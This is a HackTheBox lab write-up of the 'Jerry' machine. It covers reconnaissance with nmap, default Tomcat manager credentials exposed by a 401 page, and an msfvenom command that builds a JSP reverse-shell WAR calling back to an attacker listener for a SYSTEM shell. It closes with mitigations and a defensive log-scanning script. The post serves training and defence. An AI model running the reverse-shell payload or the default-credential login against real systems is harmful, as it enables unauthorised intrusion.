HTB: Jerry Writeup w/o Metasploit

cyber shinobii, published in System Weakness, 5 min read, Jan 30, 2022

Introduction

Welcome back to another HTB writeup. This time we’re exploring a machine named Jerry. This was definitely one of HTB’s easier boxes to exploit. Nonetheless, it was a good learning experience for me to learn more about Java exploits and how to mitigate them. Here is a video walkthrough for this writeup.

Recon

For starters, we kicked off an nmap scan, which shows that port 8080 is open.

nmap -Pn -n -sV -A -T4 --open 10.10.10.95

Port 8080 is open and it appears to be running Tomcat version 7.0.88. Before opening a web browser and assessing what’s on the page there, let’s talk about how I rushed the process. After I saw what version the server was running, I started doing some Google Kung Fu to see if there was anything on the internet about Tomcat 7.0.88, and a few results came up. For instance, CVE-2017-12617 and CVE-2019-0232 both target vulnerable versions of Tomcat.

I tried both and neither of them worked. I had a feeling CVE-2017-12617 wouldn't work because our version of Tomcat wasn’t listed as being vulnerable to this exploit. Furthermore, I just couldn’t get CVE-2019-0232 to work against the box. Now, instead of going straight for the kill with these exploits, I should’ve stuck to our typical process, which is enumerating the web page a bit more to find other vulnerabilities or information we can use to exploit the box.

Enumeration

So, let’s not rush the process and stick to our normal procedures. Let’s navigate to the web page on port 8080.

After getting to the webpage, there were three buttons that stood out to me the most: the Server Status, Manager App, and Host Manager buttons. So, one by one I started clicking them. They all asked for a username and password.

I hit “cancel” with the intention of searching for default usernames and passwords for Apache Tomcat 7.0.88. But when you hit cancel, the server returns a 401 HTTP response with some additional information.

Essentially it is telling us how to map roles to a user; roles are typically how you group access and permissions. Now, instead of searching for default credentials, I just used what was provided in this 401 error and it worked. “tomcat” was the username, and “s3cret” was the password. These are also default credentials you can find from a Google search.

Now, depending on which button you clicked to authenticate with those credentials, you’ll be on a specific page. I clicked on the Manager App and it brings us here.

Exploitation

If you analyze this page and scroll down a bit, you’ll see there’s an option to upload a WAR file. WAR files bundle a web application (including its jar files) into a single archive to make deploying it simpler; it is the same concept that containers (Docker) use to deploy applications.

Fortunately, we can use msfvenom to create a WAR file. We can do that with the following command:

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.5 lport=1234 -f war -o rshell.war

Afterwards, upload this file on the Manager App using the “Browse” button and then click deploy. We should see our reverse shell listed as an application. Next, let’s start up a netcat listener on the port you selected for the msfvenom reverse shell.

All we have to do now is execute the reverse shell. To do that, just click on the application (rshell), and we should get a connection to our listener. And fortunately, we get a shell as SYSTEM.

Conclusion

This was a pretty simple box to exploit. I enjoyed it because I recently set up a new instance of Kali on my local machine. So, it gave me a chance to figure out what tools I may have been missing and whether my scripts (nmap scripts) were working properly.

AAR

To mitigate the attack path used here:

  • (1) First and foremost, changing Tomcat’s default credentials is imperative. That alone would have prevented us from accessing the Manager App.
  • (2) The 401 error message shouldn’t disclose information about credentials, roles, and groups.
  • (3) Furthermore, we should recommend updating this version of Tomcat to a current, supported release. Other exploits could potentially work against this box, such as denial-of-service and remote code execution attacks.
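As a defender-side complement to these mitigations, here is an added example of my own (not code from the original writeup or from the Tomcat project) that scans a Tomcat access log in the default AccessLogValve format for the two events this box turns on: a Manager App login that follows repeated 401s, and a WAR deployment through the manager endpoints. The log lines are constructed for the example, and the fail_threshold value is an assumption.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Manager endpoints that accept a WAR for deployment (HTML and text interfaces).
DEPLOY_PATHS = ('/manager/html/upload', '/manager/text/deploy')

# Constructed sample log mirroring the attack path in this writeup:
# repeated 401s on the manager app, a successful login, then a WAR upload.
SAMPLE_LOG = """\
10.10.14.5 - - [30/Jan/2022:10:01:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [30/Jan/2022:10:01:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [30/Jan/2022:10:01:09 +0000] "GET /manager/html HTTP/1.1" 200 14532
10.10.14.5 - tomcat [30/Jan/2022:10:01:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=PLACEHOLDER HTTP/1.1" 200 15001
10.10.14.5 - - [30/Jan/2022:10:01:55 +0000] "GET /rshell/ HTTP/1.1" 200 0
10.10.10.1 - - [30/Jan/2022:10:02:00 +0000] "GET /docs/ HTTP/1.1" 200 7000
"""


def analyze(log_text, fail_threshold=2):
    """Return (client_ip, finding) tuples for suspicious manager-app activity.

    fail_threshold (assumed value) is how many 401s on /manager/ from one client
    must precede an authenticated 200 before the login is reported.
    """
    failures = defaultdict(int)
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines not in the expected format
        ip, user, status = m['host'], m['user'], int(m['status'])
        base_path = m['path'].split('?')[0]  # drop the CSRF nonce query string
        if not base_path.startswith('/manager/'):
            continue
        if status == 401:
            failures[ip] += 1
        elif status == 200 and user != '-' and failures[ip] >= fail_threshold:
            findings.append((ip, f'manager login as {user} after {failures[ip]} 401s'))
            failures[ip] = 0
        if m['method'] == 'POST' and base_path in DEPLOY_PATHS:
            findings.append((ip, f'WAR deployed via {base_path} by {user}'))
    return findings
```

Run against a real access log, the same logic would also surface legitimate administrator deployments, so pair it with the expected change windows for the host.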

Hopefully, you enjoyed this writeup. If you did, please let me know by leaving a clap or a comment; it is greatly and deeply appreciated. Thank you for reading. Here is a video walkthrough of Jerry for my visual learners. Thanks again.
